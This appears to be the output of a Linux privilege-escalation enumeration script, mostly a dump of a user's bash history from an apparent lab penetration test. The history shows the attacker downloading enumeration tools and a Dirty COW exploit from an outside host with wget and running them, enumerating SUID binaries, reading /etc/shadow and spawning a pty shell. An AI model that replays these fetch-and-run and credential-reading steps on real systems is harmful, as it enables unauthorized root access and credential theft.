- -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
- -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
- -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
- -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
- -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
- -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
- [-] Current user's history files:
- -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
- [+] Root's history files are accessible!
- -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
- [-] Location and contents (if accessible) of .bash_history file(s):
- /home/bob/.bash_history
- exit
- exit
- exit
- ls
- cd ..
- ls
- cd ..
- ls
- cd usr
- ls
- cd bin
- ls
- ls
- cd ..
- ls
- cd ..
- ls
- cd var
- ls
- cd bak
- cd backups/
- ls
- cd ..
- ls
- cd /
- find . -exec file {} \; | grep -i elf
- /bin/sh -i
- ls
- id
- /bin/bash
- ls -l
- strings
- strings vmlinuz
- ls
- cd sbin
- ls
- ls -l
- cd ..
- ls
- cd home
- cd bob
- ls
- cd files
- ls
- cat *
- cd ..
- cd ..
- cd ..
- cd tmp
- ls
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.0.86:8000/linuxprivchecker.py
- python linuxprivchecker.py
- /bin/su
- /usr/bin
- ls
- cd /usr/bin
- ls
- strings at
- strings at
- strings at
- wget http://10.11.0.86:8000/dcow.c
- cd /tmp
- wget http://10.11.0.86:8000/dcow.c
- chmod +x dcow.c
- ./dcow.c
- id
- euid
- ps
- ps -eo pid,user,uid,args
- ps -eo pid,euid | grep YOUR_PID_HERE
- ps
- ps -eo pid,euid | grep 3623
- ps -eo pid,euid | grep 3620
- seteuid(0)
- ps -eo pid,euid | grep 3620
- ./dcow.c
- ./dcow.c
- ./dcow.c
- ./dcow.c
- $PATH
- echo $PATH
- echo $SHELL
- find / -perm -u=s -type f 2>/dev/null
- $PATH=/bin/su
- set $PATH = /bin/su
- echo $PATH
- export PATH="$PATH:/bin/su"
- echo $PATH
- whoami
- id
- ps
- /bin/bash
- ls
- id
- echo $PATH
- ps
- ps -eo pid,euid,ruid,suid | grep 375
- ps -eo pid,euid,ruid,suid | grep 677
- ps -eo pid,euid,ruid,suid | grep 3623
- ps -eo pid,euid,ruid,suid | grep 372
- sudo su
- /bin/su
- /bin.su
- /bin/h
- /bin/sh
- ls
- id
- whoami
- ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
- ls
- ls -l
- cd vmware-root/
- ls
- strings vmware-root/
- /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
- cd /usr/lib/vmware-tools/bin32/
- ls
- ls -l
- strings vmware-user-suid-wrapper
- chmod +x vmware-user-suid-wrapper
- ./vmware-user-suid-wrapper
- id
- whoami
- uid
- id
- sudo -l
- sudo -s
- ls
- cd files
- ls
- cd ~
- ls
- cd ..
- cd ..
- ls
- cd home
- ls
- cd .ssh
- cd bob
- cd .ssj
- cd .ssh
- ls
- cat authorized_keys
- cd ..
- cd ..
- ls
- cd ..
- ls
- cat /etc/passwd
- cat /etc/shadow
- cd root
- ls
- cat proof.txt
- uname -a
- setuid id
- setuid
- setid
- access
- setfsuid
- ps -f -u user1
- ps -f -u bob
- ps -eo pid,euid,ruid,suid | grep 2174
- ps -eo pid,euid,ruid,suid | grep 2175
- ps -eo pid,euid,ruid,suid | grep 2203
- setuid(0)
- setuid() ;
- setuid(0)
- setuid('0')
- setuid(1001)
- setuid
- setuid() 1001
- setuid() -h
- man setuid
- seteuid(0)
- seteuid(1001)
- seteuid() ;
- seteuid(getuid())
- seteuid(getuid(1001))
- getenv("SUDO_UID")
- seteuid(0) /bin/bash
- /bin/bash
- $shell
- $ENV
- python
- pyton -c 'import pty;pty.spawn("/bin/bash")'
- python -c 'import pty;pty.spawn("/bin/bash")'
- cd /tmp
- ls
- wget http://10.11.0.86/linenu.sh
- wget http://10.11.0.86:8000/linenu.sh
- wget http://10.11.0.86:8000/linenum.sh
- wget http://10.11.0.86:8000/linuxprivchecker.py
- ls
- bash linenum.sh
- python linuxprivchecker.py
- wget http://10.11.0.86:8000/a.out
- ./a.out
- chmod +x a.out
- ./a.out
- id
- ps
- ps -aux
- ps -eo pid,euid,ruid,suid | grep 2272
- ps -eo pid,euid,ruid,suid | grep 2175
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- sudo
- sudo -h
- sudo --help
- sudo -l
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- ps
- ps -eo pid,euid,ruid,suid | grep 2760
- ps -eo pid,euid,ruid,suid | grep 2893
- ps
- /bin/bash
- /bin/sh
- ls
- python a.py
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- lsps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v
- ps -efl | grep 'sleep 1'
- ps -efl | grep 'sleep 1'
- python a.p
- python a.py
- ls /proc
- cd 2893
- ls
- ls /proc/2893
- ls /proc/2893/fd
- ls /proc/2893/fd/1
- ls /proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n> /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- loc
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
- python a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- whoami
- id
- ps aux
- /bin/sh
- ls
- whoami
- id
- /bin/bash
- [-] Any interesting mail in /var/mail:
- total 8
- drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
- drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
- ### SCAN COMPLETE ####################################